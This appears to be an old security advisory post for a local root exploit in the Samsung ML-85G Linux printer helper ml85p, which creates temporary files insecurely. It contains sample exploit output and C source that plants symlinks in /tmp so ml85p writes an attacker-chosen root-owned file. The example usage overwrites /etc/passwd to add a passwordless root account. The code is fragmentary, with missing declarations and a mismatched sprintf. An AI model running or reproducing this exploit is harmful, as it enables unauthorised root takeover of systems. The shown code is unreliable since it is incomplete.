Samsung ML-85G Printer Linux Driver Binary Exploit
17 Jul. 2001
Summary
The Samsung ML-85G GDI printer driver (helper binary) suffers from insecure temporary file creation practices. It is possible to create files as root, and this can lead to root compromise.
Vulnerable systems:
Ghostscript version 5.50-71
Ghostscript versiion 5.50-67
This exploit should be specific to the x86 architecture although rare cases may exist (the symlinks attack is not platform dependant). All systems running ml85p built from tarball are assumed to be vulnerable. ml85p is also distributed by MandrakeSoft in the ghostscript RPM. The permissions are more stringent and would require sys priveleges.
Exploit code:
$ ./ml85p-xpl /etc/rc.owned
owned::0:0:root:/root:/bin/bash
ml85p-xpl.c by core (c) 2001
> backing up /etc/rc.owned to /tmp/ez.n6ZT1m
/bin/cp: cannot stat `/etc/rc.owned': No such file or directory
/bin/touch: getting attributes of `/etc/rc.owned': No such file or directory
> creating a lot of symlinks
Running a few times since I'm lazy.
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
-rw-rw-rw- 1 root staff 0 Jul 10 13:14 /etc/rc.owned
-rw-rw-rw- 1 root staff 32 Jul 10 13:14 /etc/rc.owned
owned::0:0:root:/root:/bin/bash
> cleaning up
Don't forget to `cp /tmp/ez.n6ZT1m /etc/rc.owned && touch -r
/tmp/ez.n6ZT1m /etc/rc.owned`!
All done. Enjoy!
/* ml85p-xpl.c
*
* Quick hack to exploit ml85p
*
* Simply run it with the file you want to create/overwrite
* and the data you wish to place in the file.
*
* Example:
*
* $ gcc -g -Wall ml85p-xpl.c -o ml85p-xpl
* $ ./ml85p-xpl /etc/passwd owned::0:0:root:/root:/bin/bash
*
* Then login as owned... etc..
*
* by Charles Stevenson <core@ezlink.com>
*
* July 10 2001
*
* exploit discovered by KF <dotslash@snosoft.com>
*
* shoutz b10z and word to Kevin for the quick tag team :)
*/
/* set the date/time */
sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile);
system(temp);
the_time = time(NULL);
fprintf(stderr, "> creating a lot of symlinks\n");
for (i=0;i<BRUTE;i++){
sprintf(temp, "/tmp/ml85g%d", the_time+i);
symlink(argv[1], temp);
}
sprintf(temp, \
"echo \"b1nary 0utlawz\">file; umask 000 && ml85p -sf file\n", \
argv[2]);
fprintf(stderr, "Running a few times since I'm lazy.\n");
for (i=0;i<BRUTE;i++){
system(temp);
}
